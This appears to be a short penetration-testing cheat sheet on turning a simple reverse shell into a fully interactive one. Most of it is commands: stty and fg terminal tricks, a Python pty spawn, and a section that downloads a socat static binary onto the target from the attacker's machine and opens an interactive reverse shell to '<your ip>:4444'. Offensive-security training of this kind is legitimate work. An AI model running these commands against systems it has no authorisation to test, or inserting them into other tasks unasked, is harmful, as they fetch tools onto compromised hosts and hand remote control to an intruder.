
# From shell to interactive shell

This is a list of tricks to change from a simple shell to an interactive one.


### The classic way to upgrade
After getting a bash shell, one can try to use this "old trick" to upgrade it to an interactive one.

To gather information (generally it is unnecessary).
```bash
echo $TERM # to get the TERM type
stty size # get the number of rows and columns of the terminal
```

To spawn the reverse shell.
```bash
# Ctrl + Z on the reverse shell to send it to background

# With a raw stty, input/output will look weird and you won’t see the next commands, 
# but as you type they are being processed.
stty raw -echo

# To get the reverse shell back on the foreground
fg 

# To reinitialise the shell
reset

# To setup the shell
export SHELL=bash
stty rows 28 columns 72 # Set remote shell to 28 rows and 72 columns (or use the gathered info)
export TERM=xterm-256color # Allows one to clear the console, and have a colour output
```
After this the reverse shell should be interactive.
If it is not working, here are common problems and fixes.
- Use `rlwrap nc -lvnp` when setting up your listener;
- Make sure not to put a space in your python pty command after the import;
- Type `stty size;stty raw -echo;fg` all on one line.

As a last resort, if you are using zsh, you could just switch to bash instead when setting up your nc listener.


### Python

Check if you can run Python in the current shell, and if you can, upgrade the shell with it (doesn't always work!). 
```bash
which python python2 python3
python -c 'import pty;pty.spawn("/bin/bash")';
```

### Sending over a static binary

Suppose you are not finding anything on the machine that you can run to create an interactive shell.
If you have RCE, and you can use either `wget` or `curl`, you can send a static binary of an application that allows you to create an interactive shell.

In this example I:
1. Open a Python server and use it to send a socat static binary;
2. Spawn an interactive reverse shell.
```bash
# Your machine
wget https://github.com/andrew-d/static-binaries/raw/master/binaries/linux/x86_64/socat
sudo python -m http.server 80 

# Target machine
wget http://<your ip>/socat
chmod +x socat

# Your machine
socat file:`tty`,raw,echo=0 tcp-listen:4444

# Target machine
./socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:<your ip>:4444
export TERM=xterm-256color # sometimes needed
```

You can get more helpful static binaries at the following.
You can also create your own.
- [Andrew-d's static binaries](https://github.com/andrew-d/static-binaries)
- [ZephrFish's static-tools](https://github.com/ZephrFish/static-tools)
- [Andrew Dunham's pentest-tools](https://gitlab.com/pentest-tools/static-binaries)


### Others

**[GTFObins - Large collection of tricks to spawn shells worth checking out](https://gtfobins.github.io/#+shell)**

**[Hacktricks - When you just can't upgrade your shell but need to interact](https://book.hacktricks.xyz/generic-methodologies-and-resources/shells/full-ttys#no-tty)**


### Sources

- [Upgrade Linux shell](https://zweilosec.github.io/posts/upgrade-linux-shell/)
- [Hacktrick's Full TTYS](https://book.hacktricks.xyz/generic-methodologies-and-resources/shells/full-ttys)
- [Upgrading simple shells to fully interactive shells](https://blog.ropnop.com/upgrading-simple-shells-to-fully-interactive-ttys/)


